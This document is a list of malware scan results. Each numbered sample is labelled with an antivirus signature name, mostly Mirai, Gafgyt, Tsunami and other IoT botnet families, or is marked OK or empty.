## 175 Unix.Trojan.Mirai-7666587-0
## 128 Unix.Dropper.Mirai-7135870-0
## 273 Unix.Dropper.Mirai-7135870-0
## 882 Unix.Trojan.Mirai-7669677-0
## 253 OK
## 614 OK
## 490 Unix.Trojan.Mirai-6976991-0
## 935 Unix.Trojan.Mirai-6976991-0
## 463 Unix.Trojan.Mirai-6976991-0
## 972 Unix.Trojan.Mirai-6976991-0
## 101 Unix.Trojan.Mirai-6976991-0
## 504 Unix.Trojan.Mirai-6976991-0
## 279 Unix.Trojan.Mirai-6976991-0
## 629 Unix.Dropper.Mirai-7135965-0
## 491 Unix.Dropper.Mirai-7135965-0
## 583 Unix.Dropper.Mirai-7135965-0
## 584 Unix.Dropper.Mirai-7135965-0
## 813 Unix.Dropper.Mirai-7135965-0
## 1179 Unix.Dropper.Mirai-7135965-0
## 432 Unix.Dropper.Mirai-7135965-0
## 664 Unix.Dropper.Mirai-7135965-0
## 898 Unix.Dropper.Mirai-7135965-0
## 16 Unix.Dropper.Mirai-7135965-0
## 99 OK
## 414 OK
## 1005 OK
## 398 OK
## 826 OK
## 718 Unix.Trojan.Tsunami-9845728-0
## 606 OK
## 377 Unix.Trojan.Tsunami-9869508-0
## 670 OK
## 836 OK
## 831 OK
## 368 OK
## 292 OK
## 233 OK
## 632 Win.Trojan.Zegost-9886625-1
## 654 Unix.Trojan.Agent-37066
## 284 Unix.Trojan.Mozi-9840825-0
## 283 Unix.Trojan.Mozi-9840825-0
## 866 Unix.Trojan.Mirai-7100807-0
## 286 Unix.Trojan.Mozi-9840825-0
## 427 Unix.Trojan.Gafgyt-9499853-0
## 426 Unix.Trojan.Gafgyt-9499853-0
## 865 Unix.Trojan.Mirai-7100807-0
## 1144 Unix.Trojan.Mirai-9894781-0
## 920 Unix.Trojan.Mirai-9894781-0
## 1096 Unix.Trojan.Generic-9907087-0
## 226 Unix.Trojan.Mirai-9907011-0
## 979 Unix.Trojan.Mirai-7669677-0
## 362 OK
## 543 Unix.Trojan.Generic-9906955-0
## 596 Unix.Trojan.Mirai-7666587-0
## 453 Unix.Trojan.Mirai-7669677-0
## 525 OK
## 1009 OK
## 208 Unix.Dropper.Mirai-7135890-0
## 147 Unix.Dropper.Mirai-7135890-0
## 748 Unix.Dropper.Mirai-7135890-0
## 1172 Unix.Dropper.Mirai-7135890-0
## 1148 Unix.Trojan.Mirai-6981989-0
## 219 Unix.Dropper.Mirai-7135890-0
## 706 Unix.Dropper.Mirai-7135890-0
## 1085 Unix.Dropper.Mirai-7135890-0
## 644 Unix.Dropper.Mirai-7135890-0
## 828 Unix.Dropper.Mirai-7135890-0
## 83 Unix.Trojan.Mirai-7139482-0
## 357 Unix.Dropper.Mirai-7135890-0
## 265 Unix.Trojan.Mirai-6981989-0
## 1082 Unix.Dropper.Mirai-7135890-0
## 393 Unix.Dropper.Mirai-7135890-0
## 65 Unix.Dropper.Mirai-7135890-0
## 299 Unix.Dropper.Mirai-7135890-0
## 1136 Unix.Dropper.Mirai-7135890-0
## 1083 Unix.Dropper.Mirai-7135890-0
## 27 Unix.Dropper.Mirai-7135890-0
## 58 Unix.Dropper.Mirai-7135890-0
## 404 Unix.Dropper.Mirai-7135890-0
## 731 OK
## 354 Unix.Tool.Generic-7660958-0
## 352 OK
## 745 Unix.Dropper.Mirai-7135870-0
## 657 Unix.Trojan.Mirai-9894781-0
## 493 Unix.Trojan.Mirai-9894781-0
## 1018 OK
## 843 OK
## 93 OK
## 240 Unix.Trojan.Mirai-6981989-0
## 630 OK
## 936 OK
## 1146 Unix.Trojan.Mirai-7666587-0
## 998 Unix.Dropper.Mirai-7135870-0
## 431 Unix.Dropper.Mirai-7135870-0
## 221 OK
## 1068 Empty file
## 1059 Unix.Dropper.Mirai-7135906-0
## 908 Unix.Trojan.Mirai-9894781-0
## 924 Unix.Trojan.Mirai-9894781-0
## 746 OK
## 802 OK
## 80 Unix.Trojan.Mirai-7669677-0
## 674 Unix.Trojan.Mirai-6981989-0
## 1054 OK
## 1039 OK
## 454 Unix.Trojan.Mirai-7666587-0
## 347 Unix.Dropper.Mirai-7135906-0
## 26 Unix.Dropper.Mirai-7135906-0
## 103 Unix.Trojan.Mirai-7669677-0
## 308 Unix.Trojan.Mirai-9894781-0
## 919 Unix.Trojan.Mirai-9894781-0
## 482 OK
## 1056 Unix.Trojan.Mirai-9946361-0
## 577 Unix.Trojan.Mirai-7669677-0
## 1113 OK
## 307 OK
## 130 Unix.Trojan.Mirai-7666587-0
## 592 Unix.Trojan.Mirai-7669677-0
## 561 OK
## 1134 Unix.Trojan.Mirai-7100807-0
## 523 OK
## 382 OK
## 872 OK
## 822 Unix.Dropper.Mirai-9965028-0
## 438 Unix.Trojan.Mirai-7100807-0
## 48 OK
## 1088 OK
## 277 Unix.Trojan.Mirai-9936831-0
## 1090 Unix.Trojan.Mirai-7100807-0
## 1138 Unix.Trojan.Mirai-7100807-0
## 9 Unix.Dropper.Mirai-7135858-0
## 651 OK
## 871 Unix.Trojan.Mirai-9955102-0
## 509 Unix.Trojan.Mirai-9955102-0
## 1098 Unix.Trojan.Mirai-9760303-0
## 796 Unix.Trojan.Mirai-9955102-0
## 340 Unix.Trojan.Mirai-6981989-0
## 537 Unix.Trojan.Mirai-9955102-0
## 532 OK
## 954 Unix.Dropper.Mirai-7136288-0
## 355 Unix.Trojan.Mirai-9955102-0
## 174 OK
## 833 OK
## 894 OK
## 50 Unix.Trojan.Mirai-6981989-0
## 887 OK
## 136 OK
## 195 Unix.Trojan.Mirai-9936831-0
## 351 Unix.Dropper.Mirai-7135881-0
## 800 Unix.Dropper.Mirai-7135858-0
## 647 OK
## 1002 Unix.Malware.Agent-7464514-0
## 1000 Unix.Malware.Agent-7464514-0
## 1001 Unix.Malware.Agent-7464514-0
## 999 Unix.Malware.Agent-7464514-0
## 985 Unix.Trojan.Mirai-9961243-0
## 358 OK
## 798 OK
## 721 Unix.Trojan.Mirai-7669677-0
## 365 Unix.Trojan.Mirai-9894781-0
## 737 Unix.Trojan.Mirai-9894781-0
## 146 OK
## 715 OK
## 477 Unix.Trojan.Mirai-6981989-0
## 323 OK
## 199 OK
## 251 Unix.Trojan.Mirai-7666587-0
## 531 Unix.Dropper.Mirai-7135870-0
## 964 Unix.Dropper.Mirai-7135870-0
## 722 Unix.Trojan.Mirai-7669677-0
## 324 OK
## 325 OK
## 350 Unix.Dropper.Mirai-7136035-0
## 237 Unix.Dropper.Mirai-7136035-0
## 907 Unix.Dropper.Mirai-7135925-0
## 1081 Unix.Dropper.Mirai-7136035-0
## 37 Unix.Dropper.Mirai-7136035-0
## 1156 Unix.Dropper.Mirai-7136035-0
## 824 OK
## 1094 Unix.Dropper.Mirai-7136035-0
## 1 Unix.Dropper.Mirai-7136035-0
## 864 Unix.Dropper.Mirai-7136035-0
## 649 Unix.Trojan.Mirai-9770090-0
## 663 Unix.Trojan.Mirai-7135937-0
## 623 Unix.Trojan.Mirai-7135937-0
## 172 Unix.Trojan.Mirai-7135937-0
## 56 Unix.Dropper.Mirai-7135925-0
## 817 Unix.Trojan.Mirai-7135937-0
## 819 Unix.Trojan.Mirai-7135937-0
## 419 Unix.Trojan.Mirai-6981989-0
## 679 Unix.Trojan.Mirai-7135937-0
## 1152 Unix.Trojan.Mirai-7135937-0
## 850 Unix.Trojan.Mirai-7135937-0
## 333 Unix.Trojan.Mirai-7135937-0
## 1024 Unix.Trojan.Mirai-7135937-0
## 986 Unix.Trojan.Mirai-7135937-0
## 696 Unix.Trojan.Mirai-7135937-0
## 1123 OK
## 1036 Unix.Trojan.Mirai-9950082-0
## 201 Unix.Trojan.Mirai-9950082-0
## 600 Unix.Trojan.Mirai-9950082-0
## 11 Unix.Trojan.Mirai-9950082-0
## 12 Unix.Trojan.Mirai-9950082-0
## 447 Unix.Trojan.Mirai-9950082-0
## 557 Unix.Trojan.Mirai-9950082-0
## 153 Unix.Trojan.Mirai-6981989-0
## 91 Unix.Trojan.Mirai-9950082-0
## 133 Unix.Trojan.Mirai-9950082-0
## 73 Unix.Trojan.Mirai-9940367-0
## 847 Unix.Dropper.Mirai-7136288-0
## 387 Unix.Trojan.Mirai-9950082-0
## 965 Unix.Trojan.Mirai-9950082-0
## 231 OK
## 587 OK
## 328 OK
## 958 Unix.Dropper.Mirai-7135965-0
## 521 Unix.Dropper.Mirai-7135965-0
## 1137 Unix.Dropper.Mirai-7135965-0
## 183 Unix.Dropper.Mirai-7135965-0
## 962 Unix.Dropper.Mirai-7135928-0
## 636 Unix.Dropper.Mirai-7135965-0
## 878 Unix.Trojan.Mirai-6981989-0
## 145 Unix.Dropper.Mirai-7135965-0
## 460 Unix.Dropper.Mirai-7135965-0
## 406 Unix.Dropper.Mirai-7135965-0
## 131 Unix.Dropper.Mirai-7135965-0
## 44 Unix.Dropper.Mirai-7135965-0
## 441 Unix.Dropper.Mirai-7135965-0
## 991 OK
## 160 Unix.Trojan.Mirai-7100807-0
## 742 Unix.Trojan.Mirai-7100807-0
## 1080 Unix.Trojan.Mirai-7100807-0
## 542 OK
## 918 Unix.Trojan.Mirai-7100807-0
## 276 Unix.Trojan.Mirai-7100807-0
## 841 Unix.Trojan.Mirai-7100807-0
## 1087 Unix.Dropper.Mirai-7464847-0
## 702 Unix.Dropper.Mirai-7464847-0
## 310 Unix.Dropper.Mirai-7464847-0
## 969 Unix.Dropper.Mirai-7464847-0
## 708 Unix.Trojan.Mirai-6981989-0
## 211 Unix.Dropper.Mirai-7464847-0
## 625 Unix.Dropper.Mirai-7464847-0
## 1178 Unix.Dropper.Mirai-7464847-0
## 507 Unix.Dropper.Mirai-7464847-0
## 248 Unix.Dropper.Mirai-7136288-0
## 524 Unix.Dropper.Mirai-7464847-0
## 75 Unix.Dropper.Mirai-7464847-0
## 1063 OK
## 209 Unix.Dropper.Mirai-7464847-0
## 469 OK
## 977 OK
## 1176 Unix.Dropper.Mirai-7464847-0
## 968 Unix.Dropper.Mirai-7464847-0
## 212 Unix.Dropper.Mirai-7464847-0
## 210 Unix.Dropper.Mirai-7464847-0
## 1177 Unix.Dropper.Mirai-7464847-0
## 703 Unix.Dropper.Mirai-7464847-0
## 701 Unix.Dropper.Mirai-7464847-0
## 1072 Empty file
## 1070 Empty file
## 1071 Empty file
## 893 OK
## 784 Win.Malware.Mikey-9917879-0
## 538 Win.Malware.Mikey-9917879-0
## 892 OK
## 783 Win.Malware.Mikey-9917879-0
## 111 Unix.Dropper.Mirai-7135968-0
## 345 Win.Malware.Nitol-6802818-0
## 539 Win.Malware.Mikey-9917879-0
## 576 Win.Trojan.Zegost-7007928-0
## 110 Unix.Dropper.Mirai-7135968-0
## 344 Win.Malware.Nitol-6802818-0
## 540 Win.Malware.Mikey-9917879-0
## 203 OK
## 953 Unix.Trojan.Mirai-9894781-0
## 300 Unix.Trojan.Mirai-9894781-0
## 1135 OK
## 458 OK
## 275 Unix.Trojan.Mirai-7669677-0
## 963 Unix.Trojan.Mirai-6981989-0
## 1053 OK
## 881 OK
## 990 Unix.Trojan.Mirai-7666587-0
## 1124 Unix.Dropper.Mirai-7135870-0
## 610 Unix.Dropper.Mirai-7135870-0
## 939 OK
## 855 Unix.Trojan.Mirai-9441505-0
## 126 Unix.Trojan.Mirai-9441505-0
## 1008 Unix.Trojan.Mirai-9441505-0
## 23 Unix.Dropper.Mirai-7135925-0
## 976 OK
## 97 Unix.Trojan.Mirai-6981989-0
## 938 Unix.Trojan.Mirai-9441505-0
## 98 Unix.Trojan.Mirai-9441505-0
## 289 Unix.Dropper.Mirai-7135957-0
## 121 Unix.Dropper.Mirai-7136288-0
## 220 Unix.Trojan.Mirai-9441505-0
## 839 Unix.Trojan.Mirai-9441505-0
## 290 Unix.Trojan.Mirai-7640640-0
## 336 Unix.Trojan.Mirai-9949346-0
## 517 Unix.Trojan.Mirai-9949346-0
## 515 Unix.Trojan.Mirai-9949346-0
## 983 Unix.Trojan.Mirai-9949755-0
## 1104 Unix.Trojan.Mirai-9949346-0
## 429 Unix.Trojan.Mirai-9949346-0
## 753 Unix.Trojan.Mirai-9940367-0
## 155 Unix.Trojan.Mirai-7138377-0
## 806 Unix.Trojan.Mirai-9949346-0
## 1112 OK
## 302 Unix.Dropper.Mirai-7135870-0
## 834 Unix.Trojan.Mirai-9894781-0
## 356 Unix.Trojan.Mirai-9894781-0
## 154 OK
## 497 OK
## 241 Unix.Trojan.Mirai-7669677-0
## 910 Unix.Trojan.Mirai-6981989-0
## 535 OK
## 1095 OK
## 106 Unix.Trojan.Mirai-7666587-0
## 666 Unix.Dropper.Mirai-7135870-0
## 410 Unix.Dropper.Mirai-7135870-0
## 483 Unix.Trojan.Mirai-7669677-0
## 660 Unix.Dropper.Mirai-7135870-0
## 94 Unix.Trojan.Mirai-9894781-0
## 648 Unix.Trojan.Mirai-9894781-0
## 166 OK
## 858 OK
## 250 Unix.Trojan.Mirai-7669677-0
## 305 Unix.Trojan.Mirai-6981989-0
## 873 OK
## 511 OK
## 4 Unix.Trojan.Mirai-7666587-0
## 1102 Unix.Dropper.Mirai-7135870-0
## 563 Unix.Dropper.Mirai-7135870-0
## 909 Unix.Trojan.Mirai-7669677-0
## 1006 OK
## 978 Unix.Dropper.Mirai-7136035-0
## 710 Unix.Dropper.Mirai-7136035-0
## 738 Unix.Dropper.Mirai-7135925-0
## 43 Unix.Dropper.Mirai-7136035-0
## 5 Unix.Dropper.Mirai-7136035-0
## 236 Unix.Dropper.Mirai-7136035-0
## 729 OK
## 891 Unix.Dropper.Mirai-7136035-0
## 46 Unix.Dropper.Mirai-7136035-0
## 361 Unix.Dropper.Mirai-7136035-0
## 693 OK
## 685 OK
## 694 OK
## 695 OK
## 691 OK
## 690 OK
## 686 OK
## 687 OK
## 682 OK
## 689 OK
## 681 OK
## 684 OK
## 683 OK
## 688 OK
## 692 OK
## 627 OK
## 256 OK
## 984 OK
## 598 OK
## 402 Unix.Trojan.Mirai-6981989-0
## 331 OK
## 867 OK
## 30 Unix.Trojan.Mirai-9936831-0
## 550 Unix.Dropper.Mirai-7135881-0
## 1044 Unix.Dropper.Mirai-7135881-0
## 1012 Unix.Dropper.Mirai-7135858-0
## 1160 Unix.Trojan.Mirai-7100807-0
## 433 Unix.Trojan.Mirai-7100807-0
## 564 Unix.Trojan.Mirai-7100807-0
## 595 Unix.Trojan.Mirai-7100807-0
## 1042 Unix.Trojan.Mirai-7100807-0
## 255 Unix.Trojan.Mirai-7100807-0
## 505 Unix.Trojan.Mirai-7100807-0
## 548 OK
## 911 OK
## 394 Unix.Trojan.Mirai-7100807-0
## 227 Unix.Trojan.Mirai-7100807-0
## 944 Unix.Trojan.Mirai-9441505-0
## 139 Unix.Trojan.Mirai-9441505-0
## 390 Unix.Trojan.Mirai-9441505-0
## 934 Unix.Dropper.Mirai-7135925-0
## 975 OK
## 974 OK
## 422 Unix.Trojan.Mirai-6981989-0
## 32 Unix.Trojan.Mirai-9441505-0
## 51 Unix.Trojan.Mirai-9441505-0
## 100 Unix.Dropper.Mirai-7135957-0
## 306 Unix.Dropper.Mirai-7136288-0
## 31 Unix.Trojan.Mirai-9441505-0
## 811 Unix.Trojan.Mirai-9441505-0
## 281 Unix.Trojan.Mirai-7640640-0
## 635 Unix.Trojan.Mirai-7135937-0
## 342 Unix.Trojan.Mirai-9907086-0
## 844 Unix.Dropper.Mirai-7135925-0
## 218 Unix.Trojan.Mirai-9907086-0
## 1106 Unix.Trojan.Mirai-9907086-0
## 728 Unix.Trojan.Mirai-6981989-0
## 613 Unix.Trojan.Mirai-9907086-0
## 182 Unix.Trojan.Mirai-9907086-0
## 536 Unix.Dropper.Mirai-7135957-0
## 1016 Unix.Dropper.Mirai-7136288-0
## 1170 Unix.Trojan.Mirai-9907086-0
## 381 Unix.Trojan.Mirai-9907086-0
## 494 Unix.Trojan.Mirai-9907086-0
## 1118 OK
## 337 Unix.Trojan.Mirai-9949346-0
## 518 Unix.Trojan.Mirai-9949346-0
## 520 Unix.Trojan.Mirai-9949346-0
## 981 Unix.Trojan.Mirai-9949755-0
## 1105 Unix.Trojan.Mirai-9949346-0
## 430 Unix.Trojan.Mirai-9949346-0
## 752 Unix.Trojan.Mirai-9940367-0
## 157 Unix.Trojan.Mirai-7138377-0
## 807 Unix.Trojan.Mirai-9949346-0
## 138 OK
## 468 Unix.Trojan.Mirai-9853181-0
## 863 Unix.Trojan.Mirai-9854559-0
## 213 OK
## 1074 Unix.Trojan.Mirai-6981989-0
## 495 Unix.Trojan.Mirai-9853181-0
## 343 Unix.Trojan.Mirai-9853181-0
## 586 Unix.Trojan.Mirai-9853181-0
## 443 Unix.Trojan.Mirai-9853181-0
## 653 Unix.Trojan.Mirai-9853181-0
## 225 OK
## 638 Unix.Dropper.Mirai-7135890-0
## 1067 Unix.Dropper.Mirai-7135890-0
## 842 Unix.Dropper.Mirai-7135890-0
## 102 Unix.Dropper.Mirai-7135890-0
## 861 Unix.Trojan.Mirai-6981989-0
## 149 Unix.Dropper.Mirai-7135890-0
## 1159 Unix.Dropper.Mirai-7135890-0
## 177 Unix.Dropper.Mirai-7135890-0
## 559 Unix.Dropper.Mirai-7135890-0
## 579 Unix.Dropper.Mirai-7135890-0
## 169 Unix.Dropper.Mirai-7135890-0
## 877 Win.Dropper.Gh0stRAT-6997745-0
## 21 Win.Malware.Johnnie-6858836-0
## 743 Win.Malware.Temr-7070541-0
## 285 Unix.Trojan.Mozi-9840825-0
## 380 OK
## 184 OK
## 631 OK
## 159 OK
## 1108 OK
## 578 OK
## 646 OK
## 260 Unix.Trojan.Tsunami-9845728-0
## 1058 OK
## 29 Unix.Trojan.Tsunami-9869508-0
## 118 OK
## 498 OK
## 1147 OK
## 912 OK
## 854 Unix.Dropper.Mirai-7139232-0
## 143 Unix.Dropper.Mirai-7139232-0
## 572 Unix.Dropper.Mirai-7139232-0
## 1155 Unix.Dropper.Mirai-7139232-0
## 8 Unix.Dropper.Mirai-7139232-0
## 571 Unix.Dropper.Mirai-7139232-0
## 1034 Unix.Dropper.Mirai-7139232-0
## 730 Unix.Dropper.Mirai-7139232-0
## 853 Unix.Dropper.Mirai-7139232-0
## 699 Unix.Dropper.Mirai-7136288-0
## 816 OK
## 656 Unix.Trojan.Gafgyt-6981156-0
## 1007 Unix.Dropper.Mirai-7139232-0
## 1025 Unix.Dropper.Mirai-7135965-0
## 372 Unix.Dropper.Mirai-7135965-0
## 465 Unix.Dropper.Mirai-7135965-0
## 565 Unix.Dropper.Mirai-7135928-0
## 425 Unix.Dropper.Mirai-7135965-0
## 547 Unix.Trojan.Mirai-6981989-0
## 119 Unix.Dropper.Mirai-7135965-0
## 360 Unix.Dropper.Mirai-7135965-0
## 258 Unix.Dropper.Mirai-7135965-0
## 803 Unix.Dropper.Mirai-7135965-0
## 727 OK
## 900 Unix.Trojan.Mirai-6976991-0
## 1117 Unix.Trojan.Mirai-6976991-0
## 464 Unix.Trojan.Mirai-6976991-0
## 129 Unix.Trojan.Mirai-6976991-0
## 906 Unix.Trojan.Mirai-6976991-0
## 530 Unix.Trojan.Mirai-6976991-0
## 437 Unix.Trojan.Mirai-6976991-0
## 471 Unix.Trojan.Mirai-6976991-0
## 1061 Unix.Trojan.Mirai-6976991-0
## 346 Unix.Trojan.Mirai-6976991-0
## 988 Unix.Trojan.Mirai-6976991-0
## 1046 OK
## 533 Unix.Dropper.Mirai-7136015-0
## 327 Unix.Dropper.Mirai-7136015-0
## 180 Unix.Dropper.Mirai-7136015-0
## 508 Unix.Dropper.Mirai-7135925-0
## 597 Unix.Dropper.Mirai-7136015-0
## 2 Unix.Trojan.Mirai-6981989-0
## 59 Unix.Dropper.Mirai-7136015-0
## 150 Unix.Dropper.Mirai-7136015-0
## 1121 Unix.Dropper.Mirai-7135957-0
## 190 Unix.Dropper.Mirai-7136015-0
## 189 Unix.Dropper.Mirai-7136015-0
## 52 Unix.Dropper.Mirai-7136015-0
## 116 OK
## 339 OK
## 675 Unix.Trojan.Tsunami-6981155-0
## 581 Unix.Trojan.Tsunami-6981155-0
## 413 Unix.Trojan.Gafgyt-6981154-0
## 108 OK
## 1069 Empty file
## 389 Unix.Trojan.Gafgyt-6981154-0
## 676 Unix.Trojan.Gafgyt-6981154-0
## 711 OK
## 436 Unix.Trojan.Tsunami-6981155-0
## 415 Unix.Trojan.Tsunami-6981155-0
## 555 Unix.Trojan.Tsunami-6981155-0
## 1052 Unix.Trojan.Tsunami-6981155-0
## 904 Unix.Trojan.Tsunami-6981155-0
## 643 Unix.Trojan.Tsunami-6981155-0
## 1111 Unix.Trojan.Gafgyt-6981154-0
## 66 Unix.Dropper.Mirai-7135890-0
## 655 Unix.Dropper.Mirai-7135890-0
## 677 Unix.Dropper.Mirai-7135890-0
## 1110 Unix.Dropper.Mirai-7135890-0
## 484 OK
## 263 Unix.Dropper.Mirai-7135890-0
## 997 Unix.Dropper.Mirai-7135890-0
## 884 Unix.Dropper.Mirai-7135890-0
## 274 Unix.Dropper.Mirai-7135890-0
## 309 OK
## 785 Unix.Dropper.Mirai-7135890-0
## 1033 OK
## 973 OK
## 164 Unix.Trojan.Mirai-9939496-0
## 7 Unix.Trojan.Mirai-6981989-0
## 114 OK
## 489 OK
## 319 Unix.Trojan.Mirai-9936831-0
## 42 Unix.Dropper.Mirai-7136288-0
## 55 Unix.Dropper.Mirai-7355719-0
## 917 Unix.Dropper.Mirai-7135858-0
## 714 OK
## 640 Unix.Dropper.Mirai-7138865-0
## 781 Unix.Dropper.Mirai-7138865-0
## 38 Unix.Dropper.Mirai-7138865-0
## 1101 Unix.Dropper.Mirai-7138865-0
## 1180 OK
## 3 OK
## 435 Unix.Dropper.Mirai-7138865-0
## 373 Unix.Dropper.Mirai-7138865-0
## 570 Unix.Dropper.Mirai-7138865-0
## 704 Unix.Dropper.Mirai-7138865-0
## 639 Unix.Dropper.Mirai-7138865-0
## 641 Unix.Dropper.Mirai-7138865-0
## 193 Unix.Dropper.Mirai-7136288-0
## 1158 Unix.Trojan.Gafgyt-6981156-0
## 1004 Unix.Dropper.Mirai-7138865-0
## 874 Unix.Dropper.Mirai-7135870-0
## 1038 Unix.Trojan.Mirai-9894781-0
## 316 OK
## 526 OK
## 955 OK
## 941 Unix.Trojan.Mirai-7669677-0
## 178 Unix.Trojan.Mirai-6981989-0
## 230 OK
## 959 OK
## 616 Unix.Trojan.Mirai-7666587-0
## 589 Unix.Dropper.Mirai-7135870-0
## 123 Unix.Dropper.Mirai-7135870-0
## 267 Unix.Trojan.Mirai-7669677-0
## 18 Unix.Dropper.Mirai-7139232-0
## 788 Unix.Dropper.Mirai-7139232-0
## 889 Unix.Dropper.Mirai-7139232-0
## 486 Unix.Dropper.Mirai-7139232-0
## 1132 OK
## 875 Unix.Dropper.Mirai-7135870-0
## 1037 Unix.Trojan.Mirai-9894781-0
## 317 OK
## 527 OK
## 956 OK
## 942 Unix.Trojan.Mirai-7669677-0
## 179 Unix.Trojan.Mirai-6981989-0
## 229 OK
## 960 OK
## 615 Unix.Trojan.Mirai-7666587-0
## 957 OK
## 590 Unix.Dropper.Mirai-7135870-0
## 124 Unix.Dropper.Mirai-7135870-0
## 268 Unix.Trojan.Mirai-7669677-0
## 1129 OK
## 1131 OK
## 412 Unix.Dropper.Mirai-7139232-0
## 940 Unix.Dropper.Mirai-7139232-0
## 860 Unix.Dropper.Mirai-7139232-0
## 17 Unix.Dropper.Mirai-7139232-0
## 789 Unix.Dropper.Mirai-7136288-0
## 25 Unix.Trojan.Gafgyt-6981156-0
## 216 Unix.Dropper.Mirai-7139232-0
## 809 OK
## 829 Unix.Dropper.Mirai-7135870-0
## 232 Unix.Dropper.Mirai-7135870-0
## 585 Unix.Dropper.Mirai-7135870-0
## 994 Unix.Dropper.Mirai-7135870-0
## 501 Unix.Dropper.Mirai-7135870-0
## 61 Unix.Dropper.Mirai-7135870-0
## 1161 Unix.Trojan.Mirai-6981989-0
## 171 Unix.Dropper.Mirai-7135870-0
## 148 Unix.Dropper.Mirai-7135870-0
## 672 Unix.Dropper.Mirai-7135870-0
## 1079 Unix.Dropper.Mirai-7135870-0
## 846 Unix.Dropper.Mirai-7135870-0
## 995 Unix.Dropper.Mirai-7135870-0
## 905 Win.Dropper.Gh0stRAT-6997745-0
## 135 Win.Dropper.Gh0stRAT-6997745-0
## 367 Win.Malware.Temr-7070541-0
## 142 Win.Dropper.Gh0stRAT-6997745-0
## 618 Win.Malware.Johnnie-6858836-0
## 318 Win.Dropper.Gh0stRAT-6997745-0
## 574 OK
## 617 Win.Malware.Johnnie-6858836-0
## 96 OK
## 163 OK
## 363 Win.Dropper.Gh0stRAT-6997745-0
## 217 Win.Malware.Johnnie-6858836-0
## 1010 OK
## 192 OK
## 1013 Win.Malware.Siscos-6993581-0
## 122 Win.Malware.Johnnie-6858836-0
## 125 Win.Malware.Temr-7070541-0
## 338 Unix.Trojan.Mirai-9949346-0
## 516 Unix.Trojan.Mirai-9949346-0
## 519 Unix.Trojan.Mirai-9949346-0
## 982 Unix.Trojan.Mirai-9949755-0
## 1103 Unix.Trojan.Mirai-9949346-0
## 428 Unix.Trojan.Mirai-9949346-0
## 754 Unix.Trojan.Mirai-9940367-0
## 156 Unix.Trojan.Mirai-7138377-0
## 808 Unix.Trojan.Mirai-9949346-0
## 895 OK
## 158 Win.Spyware.80656-1
## 194 OK
## 857 Win.Malware.Nitol-9953104-0
## 15 Unix.Trojan.Agent-37008
## 1075 OK
## 67 OK
## 224 OK
## 1164 Unix.Dropper.Mirai-7135870-0
## 452 Unix.Trojan.Mirai-9894781-0
## 793 Unix.Trojan.Mirai-9894781-0
## 567 OK
## 1030 Unix.Trojan.Mirai-9946361-0
## 1140 Unix.Trojan.Mirai-7669677-0
## 916 Unix.Trojan.Mirai-6981989-0
## 478 OK
## 84 OK
## 312 Unix.Trojan.Mirai-7666587-0
## 553 Unix.Dropper.Mirai-7135870-0
## 1168 Unix.Dropper.Mirai-7135870-0
## 1050 Unix.Trojan.Mirai-7669677-0
## 1076 OK
## 1165 Unix.Dropper.Mirai-7135870-0
## 451 Unix.Trojan.Mirai-9894781-0
## 791 Unix.Trojan.Mirai-9894781-0
## 568 OK
## 1028 Unix.Trojan.Mirai-9946361-0
## 1139 Unix.Trojan.Mirai-7669677-0
## 913 Unix.Trojan.Mirai-6981989-0
## 481 OK
## 86 OK
## 313 Unix.Trojan.Mirai-7666587-0
## 552 Unix.Dropper.Mirai-7135870-0
## 1166 Unix.Dropper.Mirai-7135870-0
## 1049 Unix.Trojan.Mirai-7669677-0
## 70 OK
## 1163 Unix.Dropper.Mirai-7135870-0
## 450 Unix.Trojan.Mirai-9894781-0
## 794 Unix.Trojan.Mirai-9894781-0
## 1029 Unix.Trojan.Mirai-9946361-0
## 1141 Unix.Trojan.Mirai-7669677-0
## 914 Unix.Trojan.Mirai-6981989-0
## 479 OK
## 87 OK
## 314 Unix.Trojan.Mirai-7666587-0
## 554 Unix.Dropper.Mirai-7135870-0
## 1169 Unix.Dropper.Mirai-7135870-0
## 1047 Unix.Trojan.Mirai-7669677-0
## 1162 Unix.Dropper.Mirai-7135870-0
## 449 Unix.Trojan.Mirai-9894781-0
## 792 Unix.Trojan.Mirai-9894781-0
## 569 OK
## 1031 Unix.Trojan.Mirai-9946361-0
## 1142 Unix.Trojan.Mirai-7669677-0
## 915 Unix.Trojan.Mirai-6981989-0
## 480 OK
## 85 OK
## 311 Unix.Trojan.Mirai-7666587-0
## 551 Unix.Dropper.Mirai-7135870-0
## 1167 Unix.Dropper.Mirai-7135870-0
## 1048 Unix.Trojan.Mirai-7669677-0
## 69 OK
## 68 OK
## 71 OK
## 197 Unix.Trojan.Mirai-9441505-0
## 901 Unix.Trojan.Mirai-9441505-0
## 740 Unix.Trojan.Mirai-9441505-0
## 502 Unix.Dropper.Mirai-7135925-0
## 810 OK
## 64 Unix.Trojan.Mirai-6981989-0
## 993 Unix.Trojan.Mirai-9441505-0
## 401 Unix.Trojan.Mirai-9441505-0
## 95 Unix.Dropper.Mirai-7135957-0
## 899 Unix.Dropper.Mirai-7136288-0
## 1077 Unix.Trojan.Mirai-9441505-0
## 619 Unix.Trojan.Mirai-9441505-0
## 1011 Unix.Trojan.Mirai-7640640-0
## 876 Unix.Dropper.Mirai-8011185-0
## 750 Unix.Trojan.Mirai-8011183-0
## 852 Unix.Dropper.Mirai-7816558-0
## 79 Unix.Trojan.Mirai-8026838-0
## 421 Unix.Trojan.Mirai-6981989-0
## 510 Unix.Trojan.Mirai-7846756-0
## 952 OK
## 815 Unix.Trojan.Mirai-9936831-0
## 28 Unix.Dropper.Mirai-7135890-0
## 271 Unix.Dropper.Mirai-7135890-0
## 444 Unix.Trojan.Mirai-7829191-0
## 409 OK
## 1092 OK
## 472 Unix.Trojan.Generic-9917199-0
## 416 Unix.Trojan.Mirai-7853646-0
## 602 Unix.Trojan.Mirai-8011183-0
## 408 Unix.Dropper.Mirai-7816558-0
## 278 Unix.Trojan.Mirai-8026838-0
## 168 Unix.Trojan.Mirai-6981989-0
## 637 Unix.Trojan.Mirai-7846756-0
## 1126 Unix.Trojan.Mirai-7831925-0
## 1003 Unix.Trojan.Mirai-9769110-0
## 951 Unix.Dropper.Mirai-7135890-0
## 1020 Unix.Dropper.Mirai-7135890-0
## 245 Unix.Trojan.Mirai-7829191-0
## 758 Unix.Trojan.Mirai-7100807-0
## 759 Unix.Trojan.Mirai-7100807-0
## 757 Unix.Trojan.Mirai-7100807-0
## 777 Unix.Trojan.Mirai-7100807-0
## 756 Unix.Trojan.Mirai-7100807-0
## 763 Unix.Trojan.Mirai-7100807-0
## 765 Unix.Trojan.Mirai-7100807-0
## 779 Unix.Trojan.Mirai-7100807-0
## 776 Unix.Trojan.Mirai-7100807-0
